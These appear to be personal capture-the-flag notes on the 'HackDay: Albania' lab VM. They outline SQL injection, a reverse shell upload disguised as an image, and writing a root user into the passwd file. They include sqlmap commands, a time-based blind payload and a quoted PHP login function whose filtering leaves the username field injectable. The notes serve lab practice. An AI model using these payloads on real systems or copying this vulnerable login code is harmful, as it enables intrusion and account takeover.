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39 VM : HackDay: Albania,167/


A. [directory hopping using wfuzz, sql injection, sqlmap, file type restriction upload php reverse shell as jpg, msfvenom,meterpreter, no python 2.7 or gcc, password in config.php, mysql> prompt, outfile from mysql, writetable passwd file, adding a root user/pwd to passwd file]

B. []

C. [dirsearch, sqlmap time based blind attack, why username field is susceptible to attack while password field isnt ,port forward in our meterpreter session]



Walkthru C..I note in Sqlmap that we were redirected to index.php when triggering the payload. Let's try entering the generated payload of username=test' RLIKE SLEEP(5)-- smYE as our username, and see why we're being redirected to index.php. Tried to login with it , and I was in

root@kali:~# sqlmap -u --data "username=test*&password=ing" --threads 10 --random-agent --risk 3 --level 5

root@kali:~# sqlmap -u --data "username=test*&password=ing" --threads 10 --random-agent --risk 3 --level 5 --technique T
T=time based blind attack 

Ok - obviously the login function must be defined in config.php, so let's see what we've got. I cat out the contents of config.php, and find the check_login function.
function check_login($username,$password){

    $username = str_ireplace("OR", "", $username);
    $username = str_ireplace("UNION", "", $username);
    $username = str_ireplace("AND", "", $username);
    $password = str_ireplace("'","",$password);
    $sql_query = "SELECT ID FROM klienti where `username` = '$username' and `password` = '$password';";
    $result = mysqli_fetch_assoc(execute_query($sql_query));
    $result = $result["ID"];
    if($result >= 1){
        return $result;
        return -1;

Ok - so we were unable to retrieve any data, because a number of key commands are stripped out. The reason that the username field is the only vulnerable parameter is because the ' character is stripped from the password field.


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